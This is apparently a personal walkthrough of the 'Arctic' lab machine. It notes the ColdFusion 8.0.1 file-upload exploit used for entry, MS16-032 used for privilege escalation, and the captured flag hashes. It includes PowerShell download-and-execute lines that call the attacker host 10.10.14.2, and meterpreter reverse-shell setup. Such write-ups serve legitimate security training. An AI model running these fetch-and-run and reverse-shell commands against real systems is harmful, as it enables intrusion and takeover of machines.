Links

Arctic

Arctic 10.10.10.11

Target Enumeration:

OS: Windows 2008
IP: 10.10.10.11
User: 02650d3a69a70780c302e146a6cb96f3
Root: ce65ceee66b2b5ebaff07e50508ffb90

Ports / Services / Software Versions Running

135/tcp open msrpc Microsoft Windows RPC 8500/tcp open http JRun Web Server 49154/tcp open msrpc Microsoft Windows RPC

Vulnerability Exploited:

ColdFusion 8.0.1 Arbitrary File Upload and Execute
This module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload and Execute vulnerability.

Privilege Escalation:

MS16-032 Secondary Logon Handle Privilege Escalation
This module exploits the lack of sanitization of standard handles in Windows' Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores.

Replicating the exploit:

Nmap TCP
Webapp on port 8500
Dir search
Administrator gives a version 8
Searchsploit
Found the metasploit version of the exploit
Set options as follows
Start burp listener on port 127.0.0.1:8500 Check it works in the browser
Capture the request in burp
Check the filename it is writing to.
Navigate to that file via the browser and set up your nc listener on port 4444
Like so
Gather system info etc
Grab user file Execute Sherlock.ps1 after copying it to your pwd and starting your webserver.
echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.2/Invoke-MS16032.ps1") | powershell -noprofile -
Did not work so try getting a meterpreter shell instead.
python unicorn.py windows/meterpreter/reverse_tcp 10.10.14.2 4445
msfconsole -r unicorn.rc
cat powershell_attack.txt > exploit.html
Nano exploit.html Delete powershell etc to “sv including the single quote and the quote at the end.
Copy to your webserver
Run the following on Artic
powershell "iex(new-object net.webclient).downloadstring('http://10.10.14.2/exploit.html')"
Check meterpreter
Run local exploit suggester (32 bit)
This ran as 32 bit so switch to meterpreter and change to a 64 bit process
Only one as 64 bit
Set your options as follows:
Run the exploit to get a system shell.
Root.txt